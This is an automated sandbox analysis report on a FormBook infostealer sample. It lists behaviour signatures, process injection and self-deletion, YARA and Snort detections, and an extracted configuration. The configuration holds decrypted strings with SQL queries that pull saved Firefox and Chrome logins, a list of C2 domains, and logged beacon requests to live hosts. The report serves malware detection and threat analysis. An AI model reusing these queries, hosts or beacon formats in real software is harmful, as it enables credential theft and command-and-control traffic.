Loading ...

Play interactive tourEdit tour

Analysis Report SKM_C36821010708320.exe

Overview

General Information

Sample Name:SKM_C36821010708320.exe
Analysis ID:339379
MD5:15d8096422d137c7388908bb2be61ec4
SHA1:e67d261ef38eb251fb97a466d83c95e75d286ebe
SHA256:fae57c2f185899220dff608004ab571822fc14cc02aa7e30b1cd5db7be4beea8
Tags:DHLexeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SKM_C36821010708320.exe (PID: 4740 cmdline: 'C:\Users\user\Desktop\SKM_C36821010708320.exe' MD5: 15D8096422D137C7388908BB2BE61EC4)
    • SKM_C36821010708320.exe (PID: 1928 cmdline: C:\Users\user\Desktop\SKM_C36821010708320.exe MD5: 15D8096422D137C7388908BB2BE61EC4)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 1736 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 4952 cmdline: /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x99bc", "KEY1_OFFSET 0x1e51d", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1e61b", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1d163", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1a749ebd", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "shuttergame.com", "beyondregions.com", "cuttingedgetinting.com", "riveraspanishfoods.com", "jfksn.com", "rtplay2020.com", "idahofallsobituaries.com", "qf432.com", "magandaconfections.com", "suremlak.com", "tuproductividadpersonal.com", "ziswmyxaw.icu", "howtolovemybody.com", "signpartnerpro.com", "conservative-forward.com", "bhscsh.com", "todowine.com", "garrettthermaldetector.com", "bunbook.com", "ehealthla.com", "mojacreations.com", "2kantxt.com", "aqustea.com", "sheilataman.com", "phymath.science", "sctuba.com", "columbusestatesseniorliving.com", "opyalliy.pro", "bestgiftforu.com", "cad-office-iserlohn.com", "gorgeus-girl-full-service.today", "easthaus-modern.com", "snoozefest.online", "service-xwcrvxsz.icu", "flavourcosmetics.com", "news247alert.com", "944ka.xyz", "bcheap3dmall.com", "crepkonnect.com", "purelili.com", "pushupbras.net", "ctsafaris.com", "sprinkleforever.com", "engagingsci.coach", "aihint.com", "icxrus.com", "7vitrines.com", "mrsgariepy.com", "bikewitha.pro", "adv-assist.com", "youlacka.com", "languagekickstart.com", "commonscentsbychloe.com", "o-tanemaki.com", "wlgdrs.com", "imbentaryo.com", "winwithrundlemall.com", "jumben.xyz", "24k88lotto.com", "bundlesofjoihair.com", "bukannyaterbuai31.com", "essentialeatscatering.com", "brasseriedufayard.com", "trumpvotr.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.ameeraglow.com/6bu2/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.SKM_C36821010708320.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.SKM_C36821010708320.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.SKM_C36821010708320.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        2.2.SKM_C36821010708320.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.SKM_C36821010708320.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x99bc", "KEY1_OFFSET 0x1e51d", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1e61b", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1d163", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1a749ebd", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: SKM_C36821010708320.exeReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: SKM_C36821010708320.exeJoe Sandbox ML: detected
          Source: 2.2.SKM_C36821010708320.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SKM_C36821010708320.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: SKM_C36821010708320.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_060CB410
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 4x nop then pop esi2_2_004172D8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop esi6_2_030172D8

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.o-tanemaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.idahofallsobituaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.bhscsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.sheilataman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.ehealthla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.128.23.153 52.128.23.153
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: WIIUS WIIUS
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: Joe Sandbox ViewASN Name: DOSARRESTUS DOSARRESTUS
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.o-tanemaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.idahofallsobituaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.bhscsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.sheilataman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.ehealthla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.o-tanemaki.com
          Source: explorer.exe, 00000003.00000000.259665559.000000000F540000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
